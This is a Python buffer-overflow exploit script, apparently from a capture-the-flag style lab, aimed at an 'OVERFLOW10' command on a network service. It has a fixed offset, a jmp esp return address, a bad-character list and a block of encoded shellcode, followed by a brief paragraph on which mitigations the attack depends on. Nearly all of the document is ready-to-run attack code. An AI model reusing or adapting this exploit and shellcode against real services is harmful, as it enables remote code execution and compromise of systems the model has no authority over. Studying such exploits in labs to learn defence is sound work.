Example payload scripts

Badchars (bytes that must not appear anywhere in the part of the buffer the target interprets as a return address or as code — here the `jmp esp` address, the stack adjustment and the encoded shellcode): \x00\xa0\xad\xbe\xde\xef

Exploit code

#!/usr/bin/env python3
import socket


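ip = "MACHINE_IP"
port = 1337

buf_length = 1000                       # bytes after the prefix; shorter payloads are padded with 'D'
prefix = "OVERFLOW10 "                  # command the vulnerable service parses before the argument
offset = 537                            # bytes from the start of the argument to the saved EIP
overflow = "A" * offset                 # filler up to the saved return address
jmp_esp = "\x05\x12\x50\x62"            # 0x62501205 little-endian: address of the `jmp esp` gadget
                                        # that replaces the saved return pointer
# `83 ec 10` decodes to `sub esp, 0x10` -- this is NOT a NOP sled.  It moves ESP
# below the payload; the usual reason is that the decoder stub's own stack
# writes would otherwise land on top of the bytes it is still decoding.
stack_adjust = "\x83\xec\x10"
# Bytes the target mangles (see the "Badchars" note above).  Any of them in the
# return address, the stack adjustment or the shellcode would corrupt the stage,
# so build_payload() refuses to assemble a buffer that contains one.
badchars = b"\x00\xa0\xad\xbe\xde\xef"
shellcode = ("\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
    "\x11\xab\x0e\x07\x83\xee\xfc\xe2\xf4\xed\x43\x8c\x07\x11\xab"
    "\x6e\x8e\xf4\x9a\xce\x63\x9a\xfb\x3e\x8c\x43\xa7\x85\x55\x05"
    "\x20\x7c\x2f\x1e\x1c\x44\x21\x20\x54\xa2\x3b\x70\xd7\x0c\x2b"
    "\x31\x6a\xc1\x0a\x10\x6c\xec\xf5\x43\xfc\x85\x55\x01\x20\x44"
    "\x3b\x9a\xe7\x1f\x7f\xf2\xe3\x0f\xd6\x40\x20\x57\x27\x10\x78"
    "\x85\x4e\x09\x48\x34\x4e\x9a\x9f\x85\x06\xc7\x9a\xf1\xab\xd0"
    "\x64\x03\x06\xd6\x93\xee\x72\xe7\xa8\x73\xff\x2a\xd6\x2a\x72"
    "\xf5\xf3\x85\x5f\x35\xaa\xdd\x61\x9a\xa7\x45\x8c\x49\xb7\x0f"
    "\xd4\x9a\xaf\x85\x06\xc1\x22\x4a\x23\x35\xf0\x55\x66\x48\xf1"
    "\x5f\xf8\xf1\xf4\x51\x5d\x9a\xb9\xe5\x8a\x4c\xc3\x3d\x35\x11"
    "\xab\x66\x70\x62\x99\x51\x53\x79\xe7\x79\x21\x16\x54\xdb\xbf"
    "\x81\xaa\x0e\x07\x38\x6f\x5a\x57\x79\x82\x8e\x6c\x11\x54\xdb"
    "\x57\x41\xfb\x5e\x47\x41\xeb\x5e\x6f\xfb\xa4\xd1\xe7\xee\x7e"
    "\x99\x6d\x14\xc3\xce\xaf\x61\x2b\x66\x05\x11\xaa\xb5\x8e\xf7"
    "\xc1\x1e\x51\x46\xc3\x97\xa2\x65\xca\xf1\xd2\x94\x6b\x7a\x0b"
    "\xee\xe5\x06\x72\xfd\xc3\xfe\xb2\xb3\xfd\xf1\xd2\x79\xc8\x63"
    "\x63\x11\x22\xed\x50\x46\xfc\x3f\xf1\x7b\xb9\x57\x51\xf3\x56"
    "\x68\xc0\x55\x8f\x32\x06\x10\x26\x4a\x23\x01\x6d\x0e\x43\x45"
    "\xfb\x58\x51\x47\xed\x58\x49\x47\xfd\x5d\x51\x79\xd2\xc2\x38"
    "\x97\x54\xdb\x8e\xf1\xe5\x58\x41\xee\x9b\x66\x0f\x96\xb6\x6e"
    "\xf8\xc4\x10\xee\x1a\x3b\xa1\x66\xa1\x84\x16\x93\xf8\xc4\x97"
    "\x08\x7b\x1b\x2b\xf5\xe7\x64\xae\xb5\x40\x02\xd9\x61\x6d\x11"
    "\xf8\xf1\xd2")


def build_payload() -> bytes:
    """Assemble the exploit buffer.

    Layout (all latin-1, so every \\xNN literal maps to exactly one byte):

        prefix | "A" * offset | jmp_esp | stack_adjust | shellcode | "D" trailer | CRLF

    The trailer pads the part after the prefix to ``buf_length`` bytes; if the
    stage is already longer than that, no trailer is added.

    Returns:
        The complete buffer as bytes, ready to hand to ``send_payload``.

    Raises:
        ValueError: if any byte from ``badchars`` occurs in the return address,
            the stack adjustment or the shellcode -- the parts that must reach
            the target intact for control flow to land in the shellcode.
    """
    stage = (jmp_esp + stack_adjust + shellcode).encode("latin-1")
    hits = [b for b in badchars if b in stage]
    if hits:
        raise ValueError("payload contains bad characters: "
                         + ", ".join("\\x{:02x}".format(b) for b in hits))

    body = overflow.encode("latin-1") + stage
    # Original behaviour: a negative pad count simply adds nothing.
    body += b"D" * max(0, buf_length - len(body))
    return prefix.encode("latin-1") + body + b"\r\n"


def send_payload(payload: bytes, host: str = ip, dest_port: int = port,
                 timeout: float = 10.0) -> bool:
    """Deliver ``payload`` to the target over TCP.

    Args:
        payload: the buffer from ``build_payload``.
        host, dest_port: where the vulnerable service listens.
        timeout: seconds to wait for connect and for each send before giving
            up -- a target that has already crashed would otherwise hang us.

    Returns:
        True when every byte was handed to the kernel, False on a connection
        or send failure (the failure is printed, not raised).
    """
    try:
        sock = socket.create_connection((host, dest_port), timeout=timeout)
    except socket.error as exc:
        print("[-] Could not connect.")
        print("[-] {}".format(exc))
        return False

    with sock:  # closed on every exit path
        # Length reported excludes the prefix and the trailing CRLF.
        print("[+] Sending evil buffer of {} bytes...".format(len(payload) - len(prefix) - 2))
        try:
            # send() may write only part of a ~1 KiB buffer; sendall() loops until done.
            sock.sendall(payload)
        except socket.error as exc:
            print("[-] Send failed: {}".format(exc))
            return False
        print("[+] Done!")
        return True


if __name__ == "__main__":
    send_payload(build_payload())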

Counter moves

This payload script chains the classic stack-overflow steps: a fixed-offset overwrite of the saved return address, a return into a `jmp esp` gadget at a hard-coded module address, a small `sub esp` stack adjustment, and what looks like an encoded shellcode stage that avoids the listed bad characters. Rather than overcoming platform mitigations, it depends on their absence — a static gadget address only works if that module is not randomised (no ASLR), and shellcode that executes from the stack only works if the stack is executable (no DEP/NX). The defensive counterpart is in the blue notes on memory corruption and its limits.